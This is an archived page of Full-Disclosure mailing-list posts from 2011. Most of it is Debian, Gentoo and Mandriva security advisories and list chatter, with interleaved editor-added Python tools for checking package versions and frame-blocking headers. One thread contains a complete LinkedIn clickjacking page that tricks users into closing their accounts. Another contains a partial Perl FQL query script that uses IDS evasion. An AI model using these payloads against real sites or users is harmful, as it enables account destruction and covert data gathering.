[Full-disclosure] [SECURITY] [DSA 2319-1] policykit-1 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2319-1                   secur...@debian.org
http://www.debian.org/security/                           Thijs Kinkhorst
October 8, 2011                        http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : policykit-1
Vulnerability  : race condition
Problem type   : local
Debian-specific: no
CVE ID         : CVE-2011-1485
Debian Bug     : 644500

Neel Mehta discovered that a race condition in Policykit, a framework for
managing administrative policies and privileges, allowed local users to
elevate privileges by executing a setuid program from pkexec.

The oldstable distribution (lenny) does not contain the policykit-1 package.

For the stable distribution (squeeze), this problem has been fixed in
version 0.96-4+squeeze1.

For the testing distribution (wheezy) and unstable distribution (sid),
this problem has been fixed in version 0.101-4.

We recommend that you upgrade your policykit-1 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJOkEsWAAoJEOxfUAG2iX57lgwIAJ/cc9EDpnktdo5hA8g0d8+P
NNyJAJ4qJgkWvQyUqmWsISM6uWBsMUPp8WmNg8uEDqoc1r6y6XhNW0+QnZzfvz9W
/+SH/Dfr3d0K7fiTPovd/EXLozacNPKzKyHCw5yEauELbU7HYXW2AFs5JegeF7AZ
LWy96bwk62atPa1dVvNmjTAo4lpGq3DDdQWrnMqP0phLPocN7kVrmElnvlMhXz5D
V7vDBJYUm1jNfajlMSgSyrtM6AhiXiHgrLQWzJ/c2n3osU+wzUFfSq6jGmmI6dir
v8D6BHaEPp8dGHSquvv7DqHRBl9siupBTUgjtabgX9JQCLJEntmldJBfsfj9Fjg=
=tOHw
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2320-1] dokuwiki regression fix
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2320-1                   secur...@debian.org
http://www.debian.org/security/                           Thijs Kinkhorst
October 8, 2011                        http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : dokuwiki
Vulnerability  : regression fix
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2011-2510
Debian Bug     : 644145

The dokuwiki update included in Debian Lenny 5.0.9 to address a cross
site scripting issue (CVE-2011-2510) had a regression rendering links to
external websites broken. This update corrects that regression.

For the oldstable distribution (lenny), this problem has been fixed in
version 0.0.20080505-4+lenny4.

We recommend that you upgrade your dokuwiki packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJOkE33AAoJEOxfUAG2iX57bPIH/jFv4OmdhGeS12FMyZW/oq9D
CW95YdhyuZA3xRSF9fViksRAFL6D1+5tAMp7mA4GfaYm35F7nmHyHvHfYUaEnz9j
AfTGlcSwDO0pXPhcLbNH28W3T/jv48fgOE3BKvjva7drKwyF4JHjRFFcYczeqMBe
SU75CwoEHqK9TnkMQJObRFkzfbx6+IJh51qjMdA4DpCzkwDSDPpNtXZpa+zoGdU+
ICLKqUK/UYwCpwu4ycIQ/r2oeDxzk9bf+PHRtNRe5JXU4az08wGBl+ClTK+u/vqT
Fw8VRnhltwpzN9eA34R8S058JGnNom3SVoMWJIIwvrxcnKfLNR6a8gsLUNZS6KQ=
=/Uh5
-----END PGP SIGNATURE-----
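Both DSAs above name a fixed version per suite, and the practical check is whether the version actually installed sorts at or above it. That ordering is dpkg's, not plain string or float comparison: an epoch prefix wins outright, "~" sorts before everything including the end of the string (so 1.0~rc1 < 1.0), and the rest compares alternating non-digit and digit runs with digits compared numerically. The following is an added example by the editor, not Debian's code and not part of either advisory: a stand-alone reimplementation of that ordering applied to the fixed versions quoted in DSA-2319-1 and DSA-2320-1. The installed versions it is tried against are constructed. On a Debian host, `dpkg --compare-versions` and `dpkg-query -W -f='${Version}' policykit-1` give the same answer without any of this.

```python
"""Debian package version ordering (dpkg algorithm, Debian Policy 5.6.12),
used to check an installed version against the fixed version in a DSA."""
import re
from itertools import zip_longest

_NONDIGIT = re.compile(r"[^0-9]*")
_DIGIT = re.compile(r"[0-9]*")


def _order(ch):
    """Weight of one character inside a non-digit run: end-of-string is 0,
    '~' sorts below that, letters sort by code point, other characters after letters."""
    if ch == "":
        return 0
    if ch == "~":
        return -1
    if ch.isalpha():
        return ord(ch)
    return ord(ch) + 256


def _cmp_part(a, b):
    """Compare an upstream version or a Debian revision by alternating
    non-digit runs (lexical with the weights above) and digit runs (numeric)."""
    while a or b:
        na, nb = _NONDIGIT.match(a).group(0), _NONDIGIT.match(b).group(0)
        a, b = a[len(na):], b[len(nb):]
        for ca, cb in zip_longest(na, nb, fillvalue=""):
            if _order(ca) != _order(cb):
                return -1 if _order(ca) < _order(cb) else 1
        da, db = _DIGIT.match(a).group(0), _DIGIT.match(b).group(0)
        a, b = a[len(da):], b[len(db):]
        ia, ib = int(da or 0), int(db or 0)
        if ia != ib:
            return -1 if ia < ib else 1
    return 0


def parse_version(version):
    """Split '[epoch:]upstream[-revision]'; the revision is everything after the last '-'."""
    epoch = 0
    if ":" in version:
        e, version = version.split(":", 1)
        epoch = int(e)
    if "-" in version:
        upstream, _, revision = version.rpartition("-")
    else:
        upstream, revision = version, ""
    return epoch, upstream, revision


def compare_versions(a, b):
    """Return -1, 0 or 1 as `dpkg --compare-versions` would order a against b."""
    ea, ua, ra = parse_version(a)
    eb, ub, rb = parse_version(b)
    if ea != eb:
        return -1 if ea < eb else 1
    return _cmp_part(ua, ub) or _cmp_part(ra, rb)


def is_fixed(installed, fixed):
    """True when the installed version is at or above the version the DSA names."""
    return compare_versions(installed, fixed) >= 0


# Fixed versions quoted in DSA-2319-1 and DSA-2320-1 above.
DSA_FIXED = {
    ("policykit-1", "squeeze"): "0.96-4+squeeze1",
    ("policykit-1", "wheezy/sid"): "0.101-4",
    ("dokuwiki", "lenny"): "0.0.20080505-4+lenny4",
}

if __name__ == "__main__":
    # Constructed installed versions, not taken from any real system.
    installed = {"policykit-1": "0.96-4", "dokuwiki": "0.0.20080505-4+lenny4"}
    for (pkg, suite), fixed in DSA_FIXED.items():
        have = installed[pkg]
        state = "fixed" if is_fixed(have, fixed) else "VULNERABLE"
        print(f"{pkg} ({suite}): installed {have}, fixed {fixed}: {state}")
```

The "+squeeze1" suffix is why a naive string compare fails: "0.96-4" is a prefix of "0.96-4+squeeze1", and "+" must sort after end-of-string while "~" sorts before it, which `_order` encodes.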
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter
John Cartwright jo...@grok.org.uk

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia.

- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to full-disclosure-requ...@lists.grok.org.uk; send the word 'help' in either the message subject or body for details.

- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance.

It is expected that the list will be largely self-policing, however in special circumstances (e.g. spamming, misappropriation) offending members may be removed from the list by the management.

An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/.

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list.

- Posting Guidelines -

The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list.

Quoting should not exceed that which is necessary to convey context; this is especially relevant to members subscribed to the digested version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc.) but must not be active (in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected.

Members may post to the list by emailing full-disclosure@lists.grok.org.uk. Do not send subscription/unsubscription mails to this address; use the -request address mentioned above.

- Charter Additions/Changes -

The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management.

Alterations will be made after consultation with list members and a consensus has been reached.
[Full-disclosure] Some hash values
Hey all,

I believe that this is the best place to post the following hash values:

MD5Sum:    a762a3b9cbfb3d63034646087680b254
SHA1sum:   6f25d72bd693b52de25c36d04f9e17f945420580
SHA256sum: d5886dd14f3eac029d771da6bcc6d49bc2e50c79159e5390c9c0776c725243a5

Cheers,
cues0r
[Full-disclosure] [ GLSA 201110-01 ] OpenSSL: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201110-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: OpenSSL: Multiple vulnerabilities
      Date: October 09, 2011
      Bugs: #303739, #308011, #322575, #332027, #345767, #347623,
            #354139, #382069
        ID: 201110-01

Synopsis
========

Multiple vulnerabilities were found in OpenSSL, allowing for the
execution of arbitrary code and other attacks.

Background
==========

OpenSSL is an Open Source toolkit implementing the Secure Sockets Layer
(SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general
purpose cryptography library.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  dev-libs/openssl          < 1.0.0e                      >= 1.0.0e

Description
===========

Multiple vulnerabilities have been discovered in OpenSSL. Please review
the CVE identifiers referenced below for details.

Impact
======

A context-dependent attacker could cause a Denial of Service, possibly
execute arbitrary code, bypass intended key requirements, force the
downgrade to unintended ciphers, bypass the need for knowledge of shared
secrets and successfully authenticate, bypass CRL validation, or obtain
sensitive information in applications that use OpenSSL.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All OpenSSL users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.0e"

NOTE: This is a legacy GLSA. Updates for all affected architectures have
been available since September 17, 2011. It is likely that your system
is already no longer affected by most of these issues.

References
==========

[ 1 ] CVE-2009-3245
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3245
[ 2 ] CVE-2009-4355
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4355
[ 3 ] CVE-2010-0433
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0433
[ 4 ] CVE-2010-0740
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0740
[ 5 ] CVE-2010-0742
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0742
[ 6 ] CVE-2010-1633
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1633
[ 7 ] CVE-2010-2939
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2939
[ 8 ] CVE-2010-3864
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3864
[ 9 ] CVE-2010-4180
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4180
[ 10 ] CVE-2010-4252
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4252
[ 11 ] CVE-2011-0014
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0014
[ 12 ] CVE-2011-3207
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3207
[ 13 ] CVE-2011-3210
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3210

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201110-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
Re: [Full-disclosure] Facebook/google+ Cross-Site Content Forgery exploit
On 10/8/2011 8:45 PM, Antony widmal wrote:

Shit man, that's serious business (S-K trying to take over FD). Of course it's not your code, dickwad. All ya know is talking, posting shit on an IT Sec mailing list.

On Sat, Oct 8, 2011 at 7:53 PM, Laurelai <laure...@oneechan.org> wrote:

Blackhatacademy has asked me to post this to the mailing list as I'm one of the instructors there. I did not personally develop the exploit; please direct questions regarding it to hatter on irc.blackhatacademy.org.

Overview

Over the years, facebook has been vulnerable to numerous web exploitation (http://www.blackhatacademy.org/security101/index.php?title=Web_Exploitation) techniques, such as XSS (http://www.blackhatacademy.org/security101/index.php?title=XSS), FQL injection (similar to SQL injection, http://www.blackhatacademy.org/security101/index.php?title=SQL_injection), application worms, and redirect protection bypass. Because they continue to attempt to write their own language implementations, they are repeatedly vulnerable. Security by obscurity doesn't work if they document their own markup language (http://developers.facebook.com/docs/reference/fbml/) and query language (http://developers.facebook.com/docs/reference/fql/) for attackers.

History

XSS in facebook first started out as a flaw in their fbml markup (http://developers.facebook.com/docs/reference/fbml/) and subsequently became evident in a variety of facebook applications. Applications (http://www.blackhatacademy.org/security101/index.php?title=Applications) also exposed users to third party attacks that could affect a user's web browser or force actions as the affected user. Now there is a way to bypass content restrictions on links and posts put on a user's public wall.

Facebook was notified of these vulnerabilities (http://www.blackhatacademy.org/security101/index.php?title=Vulnerability) on July 31st, 2011. To date (October 4, 2011) Facebook has yet to do anything about this, demonstrating a deplorable lack of reasonable care for all of their users. For this reason, the vulnerability proof of concept code is being brought to light. Facebook has only recently purchased websense to attempt to push this vulnerability under the rug, however the exploit still works.

FQL

Simply requiring an API key for privileged queries does not protect facebook from people arbitrarily obtaining one. Facebook was even so kind as to give a reference of tables and columns in the documentation for FQL. To access Facebook's FQL API, it takes only a well-formed HTTP request with an embedded API key to return a valid XML object. FQL does not allow the use of JOINs, however it is not needed as everything is thoroughly documented. Attackers can misuse this during the creation of a malicious facebook application or directly on the FQL development API page for information gathering. The implementation below uses LibWhisker2 for IDS evasion via session splicing.

#!/usr/bin/perl
use warnings;
use XML::Simple;
use LW2;
use Getopt::Std;

# -q '<FQL>' selects the query; a fixed default is used when none is given
my %opts;
getopts('q:', \%opts);
my $query = defined $opts{q} ? $opts{q} : "SELECT pic_big FROM user WHERE uid=666";

# Walk the parsed XML result up to two levels deep and print it
my $ref = fqlQuery($query);
foreach my $parent (sort keys %{$ref}) {
    if (ref($ref->{$parent}) eq 'HASH') {
        print "$parent:\n";
        foreach my $key (sort keys %{$ref->{$parent}}) {
            if (ref($ref->{$parent}->{$key}) eq 'HASH') {
                print "\t$key :\n";
                foreach my $mojo (sort keys %{$ref->{$parent}->{$key}}) {
                    print "\t\t$mojo : ";
                    print $ref->{$parent}->{$key}->{$mojo};
                    print "\n";
                }
            } else {
                print "\t$key : ";
                print $ref->{$parent}->{$key};
                print "\n";
            }
        }
    } else {
        print "$parent : " . $ref->{$parent} . "\n";
    }
}

# Build the fql.query REST URL and parse the XML it returns
sub fqlQuery {
    my $q = shift;
    $q =~ s/ /%20/g;
    my $link = "http://api.facebook.com/method/fql.query?query=$q";
    my $text = download($link, "api.facebook.com");
    my $ref  = XMLin($text);
    return($ref);
}

# Fetch a URL through LibWhisker2
sub download {
    my $uri  = shift;
    my $try  = 5;
    my $host = shift;
    my %request;
    my %response;
    LW2::http_init_request(\%request);
[Full-disclosure] [ GLSA 201110-02 ] Wireshark: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201110-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Wireshark: Multiple vulnerabilities
      Date: October 09, 2011
      Bugs: #323859, #330479, #339401, #346191, #350551, #354197,
            #357237, #363895, #369683, #373961, #381551, #383823, #386179
        ID: 201110-02

Synopsis
========

Multiple vulnerabilities in Wireshark allow for the remote execution of
arbitrary code, or a Denial of Service condition.

Background
==========

Wireshark is a versatile network protocol analyzer.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/wireshark      < 1.4.9                      >= 1.4.9

Description
===========

Multiple vulnerabilities have been discovered in Wireshark. Please
review the CVE identifiers referenced below for details.

Impact
======

A remote attacker could send specially crafted packets on a network
being monitored by Wireshark, entice a user to open a malformed packet
trace file using Wireshark, or deploy a specially crafted Lua script for
use by Wireshark, possibly resulting in the execution of arbitrary code,
or a Denial of Service condition.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Wireshark users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.4.9"

References
==========

[ 1 ] CVE-2010-2283
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2283
[ 2 ] CVE-2010-2284
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2284
[ 3 ] CVE-2010-2285
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2285
[ 4 ] CVE-2010-2286
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2286
[ 5 ] CVE-2010-2287
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2287
[ 6 ] CVE-2010-2992
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2992
[ 7 ] CVE-2010-2993
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2993
[ 8 ] CVE-2010-2994
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2994
[ 9 ] CVE-2010-2995
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2995
[ 10 ] CVE-2010-3133
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3133
[ 11 ] CVE-2010-3445
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3445
[ 12 ] CVE-2010-4300
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4300
[ 13 ] CVE-2010-4301
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4301
[ 14 ] CVE-2010-4538
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4538
[ 15 ] CVE-2011-0024
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0024
[ 16 ] CVE-2011-0444
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0444
[ 17 ] CVE-2011-0445
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0445
[ 18 ] CVE-2011-0538
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0538
[ 19 ] CVE-2011-0713
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0713
[ 20 ] CVE-2011-1138
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1138
[ 21 ] CVE-2011-1139
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1139
[ 22 ] CVE-2011-1140
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1140
[ 23 ] CVE-2011-1141
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1141
[ 24 ] CVE-2011-1142
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1142
[ 25 ] CVE-2011-1143
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1143
[ 26 ] CVE-2011-1590
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1590
[ 27 ] CVE-2011-1591
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1591
[ 28 ] CVE-2011-1592
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1592
[ 29 ] CVE-2011-1956
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1956
[ 30 ] CVE-2011-1957
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1957
[ 31 ] CVE-2011-1958
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1958
[ 32 ] CVE-2011-1959
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1959
[ 33 ] CVE-2011-2174
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2174
[ 34 ] CVE-2011-2175
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2175
[ 35 ] CVE-2011-2597
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2597
[ 36 ] CVE-2011-2698
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2698
[ 37 ] CVE-2011-3266
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3266
[ 38 ] CVE-2011-3360
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3360
[ 39 ] CVE-2011-3482
Re: [Full-disclosure] Facebook/google+ Cross-Site Content Forgery exploit
On Sun, 09 Oct 2011 08:52:46 PDT, Laurelai said:

You sir, are an idiot.

s/an/a/ - FTFY.
[Full-disclosure] [ MDVSA-2011:131-1 ] libxml
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2011:131-1
http://www.mandriva.com/security/
_______________________________________________________________________

Package : libxml
Date    : October 9, 2011
Affected: 2011.
_______________________________________________________________________

Problem Description:

Multiple vulnerabilities have been discovered and corrected in
libxml/libxml2:

Integer overflow in xpath.c in libxml2 2.6.x through 2.6.32 and 2.7.x
through 2.7.8, and libxml 1.8.16 and earlier, allows context-dependent
attackers to cause a denial of service (crash) and possibly execute
arbitrary code via a crafted XML file that triggers a heap-based buffer
overflow when adding a new namespace node, related to handling of XPath
expressions (CVE-2011-1944).

The updated packages have been patched to correct this issue.

Update:

Packages were missing for Mandriva Linux 2011 with the MDVSA-2011:131
advisory which are now being provided.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1944
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2011:
66b5d13d1e9e6dc5a79d7f6bdce5e6bc  2011/i586/libxml1-1.8.17-18.1-mdv2011.0.i586.rpm
022ffa3441d84441f2bd312f356549ce  2011/i586/libxml1-devel-1.8.17-18.1-mdv2011.0.i586.rpm
6384102d5b61ac2c7cf4d790d90f5919  2011/i586/libxml2_2-2.7.8-6.1-mdv2011.0.i586.rpm
284c49656c3988fcbdba703b904205fa  2011/i586/libxml2-devel-2.7.8-6.1-mdv2011.0.i586.rpm
73489a6fbb129af2cd735480cf029168  2011/i586/libxml2-python-2.7.8-6.1-mdv2011.0.i586.rpm
9a813862bf2269f89bb7e81414b3e093  2011/i586/libxml2-utils-2.7.8-6.1-mdv2011.0.i586.rpm
8935abd10e88cf92c7c857a1bf8c6290  2011/SRPMS/libxml-1.8.17-18.1.src.rpm
85c9a012833b1de55c7f0bc26a79a2b1  2011/SRPMS/libxml2-2.7.8-6.1.src.rpm

Mandriva Linux 2011/X86_64:
9bc39714f2af5c88bb7bedc7bc72856d  2011/x86_64/lib64xml1-1.8.17-18.1-mdv2011.0.x86_64.rpm
083c2e62c3609ed8cff788fb2cda1b58  2011/x86_64/lib64xml1-devel-1.8.17-18.1-mdv2011.0.x86_64.rpm
097866d7240ae59af8843e487af3c755  2011/x86_64/lib64xml2_2-2.7.8-6.1-mdv2011.0.x86_64.rpm
ef477ce0daadd3d8427a76d64b0aa2f1  2011/x86_64/lib64xml2-devel-2.7.8-6.1-mdv2011.0.x86_64.rpm
aafe476b2a6ac9b00cd1e91188680ac9  2011/x86_64/libxml2-python-2.7.8-6.1-mdv2011.0.x86_64.rpm
16e64c023b78b45c912640c777df415d  2011/x86_64/libxml2-utils-2.7.8-6.1-mdv2011.0.x86_64.rpm
8935abd10e88cf92c7c857a1bf8c6290  2011/SRPMS/libxml-1.8.17-18.1.src.rpm
85c9a012833b1de55c7f0bc26a79a2b1  2011/SRPMS/libxml2-2.7.8-6.1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

 security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
 <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFOkay3mqjQ0CJFipgRAl4lAKC64p2JaOk80k+ROi2UCIC13CcRyACgjhD5
hDGQicxIZ7lyOeGw2bD+oY0=
=BXwg
-----END PGP SIGNATURE-----
Re: [Full-disclosure] Some hash values
I believe that this is the best place to post the following hash values:

MD5Sum:    a762a3b9cbfb3d63034646087680b254
SHA1sum:   6f25d72bd693b52de25c36d04f9e17f945420580
SHA256sum: d5886dd14f3eac029d771da6bcc6d49bc2e50c79159e5390c9c0776c725243a5

No, for these specific hash values, I believe the appropriate place to post them would be deviantArt.

/mz
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
It seems that you aren't familiar with what clickjacking means then...

On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 <sec...@gmail.com> wrote:

That's just lame dude. If you could remove OTHER people's accounts, then I'd say *clap clap*... but own account... what about just clicking "close account", and let's skip creating a html page for this... :)

cheers

On 8 October 2011 17:06, asish agarwalla <asishagarwa...@gmail.com> wrote:

Be logged into LinkedIn, in Firefox.
Create a HTML page using the below code.
Open the created HTML page in a new Firefox tab.
Play the simple game.

<html>
<head>
<style>
button.dummy1 { position: absolute; top: 75px; left: 177px; z-index: -10 }
button.dummy3 { position: absolute; top: 214px; left: 177px; z-index: -10 }
#Div3 { opacity: 0; position: absolute; top: 25px; left: 160px; }
#Div2 { opacity: 1; position: absolute; top: 65px; left: 340px; }
#Div1 { opacity: 1; position: absolute; top: 65px; left: 195px; }
#victim2 { opacity: 1; position: absolute; top: 65px; left: 50px; }
#victim { opacity: 0.4; position: absolute; top: -226px; left: -35px; width: 800px; height: 800px; }
</style>
</head>
<body>
<div>
<h1>Please Click Twice on the Right Options And Then Click Submit</h1>
</div>
<div id="Div3">
<h1>55+27=?</h1>
</div>
<div id="victim2">
<h1>55 </h1>
</div>
<div id="Div1">
<h1>82</h1>
</div>
<div id="Div2">
<h1>95</h1>
</div>
<button type="button" class="dummy3">Submit</button>
<div id="victim">
<iframe src="https://www.linkedin.com/secure/settings?closemyaccountstart=goback=.nas_*1_*1_*1" border="0" scrolling="no" width="650" height="1100"></iframe>
</div>
</body>
</html>

--
Ferenc Kovács
@Tyr43l - http://tyrael.hu
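The PoC above only works because the account-closure page can be loaded in an iframe from a page on another origin; the "game" just lines the victim's clicks up with buttons in a semi-transparent frame. The check a tester wants before building such a page, and the control a site owner wants to verify, is whether the response headers forbid framing. The following is an added example by the editor, not code from the thread and not LinkedIn's: it evaluates a response's X-Frame-Options and Content-Security-Policy frame-ancestors headers (the two mechanisms browsers honour today, the CSP one postdating this thread) and decides whether a given top-level origin may frame the page. The header sets and origins used in the demo are constructed; default ports are not normalised, and ALLOW-FROM is only honoured by some legacy browsers, which the code notes.

```python
"""Decide whether a page can be framed from a given top-level origin, from
its X-Frame-Options and Content-Security-Policy response headers."""
from urllib.parse import urlsplit


def parse_csp(value):
    """Return {directive: [source, ...]}; a repeated directive keeps its first
    occurrence, which is what browsers do."""
    directives = {}
    for part in value.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def _source_matches(source, origin):
    """Match one frame-ancestors source expression (anything but 'self') against
    an origin written as scheme://host[:port]."""
    src = source.strip("'").lower()
    o = urlsplit(origin.lower())
    if src == "none":
        return False
    if src == "*":
        return True
    if src.endswith(":") and "/" not in src:        # scheme-source such as https:
        return o.scheme == src[:-1]
    if "://" not in src:                             # host-source without a scheme
        src = f"{o.scheme}://{src}"
    s = urlsplit(src)
    if s.scheme != o.scheme or s.port != o.port:     # ports compared literally
        return False
    if s.hostname.startswith("*."):                  # wildcard covers subdomains only
        return o.hostname.endswith(s.hostname[1:])
    return s.hostname == o.hostname


def framing_allowed(headers, page_origin, top_origin):
    """True if a browser would render the page served with `headers` at
    `page_origin` inside a frame whose top-level document is `top_origin`.
    When CSP carries frame-ancestors it takes precedence over X-Frame-Options."""
    h = {k.lower(): v for k, v in headers.items()}
    same_origin = page_origin.lower() == top_origin.lower()

    csp = parse_csp(h.get("content-security-policy", ""))
    if "frame-ancestors" in csp:
        for source in csp["frame-ancestors"]:
            if source.strip("'").lower() == "self":
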